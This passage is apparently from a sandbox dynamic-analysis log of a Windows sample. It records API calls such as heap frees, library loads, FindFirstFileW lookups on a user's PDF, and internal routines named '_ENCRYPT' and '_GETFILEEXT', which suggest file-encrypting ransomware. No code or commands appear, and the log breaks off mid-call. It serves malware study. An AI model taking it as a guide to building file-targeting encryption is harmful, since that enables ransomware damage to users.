CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=68, lpWideCharStr=0x8feba8, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf") returned 68 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.269] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.270] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.271] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.271] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.271] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd9d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.272] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.272] CloseHandle (hObject=0x120) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.272] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.272] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0173.273] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.273] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0173.273] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.273] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0173.273] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.273] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0173.274] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.274] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0x2ad3e090, ftLastWriteTime.dwHighDateTime=0x1d5dc0a, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 0x90add8 [0173.275] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.275] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.276] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0x2ad3e090, ftLastWriteTime.dwHighDateTime=0x1d5dc0a, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 0x90add8 [0173.276] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.276] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.283] CompareStringW (Locale=0x400, 